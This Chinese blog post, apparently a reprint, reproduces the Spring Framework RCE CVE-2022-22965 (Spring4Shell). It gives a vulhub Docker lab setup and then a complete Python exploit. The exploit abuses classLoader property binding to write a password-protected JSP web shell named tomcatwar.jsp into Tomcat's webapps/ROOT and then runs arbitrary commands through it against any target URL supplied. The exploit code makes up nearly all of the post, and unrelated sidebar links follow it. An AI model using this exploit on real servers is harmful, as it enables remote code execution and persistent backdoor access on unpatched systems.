当前位置:网站首页>CVE-2022-22965複現
CVE-2022-22965複現
2022-06-22 14:01:00 【lionwerson】
CVE-2022-22965複現
簡介:
在jdk 9+上運行的Spring MVC或Spring WebFlux application可能會導致RCE
複現環境:
docker run -d -p 8080:8080 vulhub/spring-webmvc:5.3.17
服務啟動後,訪問http://your-ip:8080/?name=xxx&age=xxx
即可看到一個演示頁面。
poc:
使用方法:-t 輸入目標地址,-c輸入執行命令,默認為id
import argparse
import requests
headers = {
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en',
'suffix': '%>//',
'c1': 'Runtime',
'c2': '<%',
'DNT': '1',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}
headers_res = {
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t',"--target",help='input target',required=True,type=str)
parser.add_argument('-c',"--command",help='input poc command',type=str,default='id')
args = parser.parse_args()
url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
cmd_url = args.target + "/tomcatwar.jsp?pwd=j&cmd=" + args.command
refresh_url = args.target + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern="
res = requests.get(url=url, headers=headers)
try:
if res.status_code == 200:
res_cmd = requests.get(url=cmd_url, headers=headers)
print(res_cmd.text.replace("\x00",""))
ref_cmd = requests.get(url=refresh_url,headers=headers_res)
else:
print('Vulnerability does not exist')
except Exception as e:
print(e)
边栏推荐
- "Dare not doubt the code, but have to doubt the code" a network request timeout analysis
- 华为这份关于专利的会议纪要,都说了什么?(内含华为十大发明彩蛋)
- 聊一聊数据库的行存与列存
- Nine good programming habits for 10 years
- Technology practice | scene oriented audio and video call experience Optimization
- Z-Score和deltf/f有什么区别?
- Number of times Oracle uses cursor to decompose numbers
- Leetcode subsequence / substring problem
- Eureka的InstanceInfoReplicator类(服务注册辅助类)
- 哈希索引设计发展史
猜你喜欢
Kubernetes monitoring: grafana adds datasource and dashboard through automation
防火墙基础之策略部署
leetcode-子序列/子串問題
Flink状态管理
Configuring cplex12.4 tutorial in VS2010
openGauss内核分析之查询重写
BSN发展联盟理事长单志广:DDC可为中国元宇宙产业发展提供底层支撑
Offline physical stores combined with VR panorama make virtual shopping more realistic
如何保护WordPress网站免受网络攻击?采取安全措施至关重要
MySQL如何让一个表中可以有多个自增列
随机推荐
Leetcode math problems
Flink状态管理
leetcode-子序列/子串問題
leetcode每日一题202110
"N'osez pas douter du Code, vous devez douter du Code" notez une analyse de délai de demande réseau
Acwing 241 Loulan totem (detailed explanation of tree array)
Problème de sous - séquence / substrat leetcode
Andrdoid delay operation
leetcode-子序列/子串问题
数据库 就业咨询系统求各位帮下忙
uniapp app 端截屏且保存到本地
leetcode 32. Longest valid bracket
论文专利博客写作总结
别再用 System.currentTimeMillis() 统计耗时了,太 Low,StopWatch 好用到爆!
Performance of recommender algorithms on top-N recommendation tasks
Stephencovey's tips for efficient work for young people
Customer member value analysis
SQL and Oracle statements for eliminating duplicate records
Do you know the scope and process of software project acceptance testing?
简简单单的科研秘籍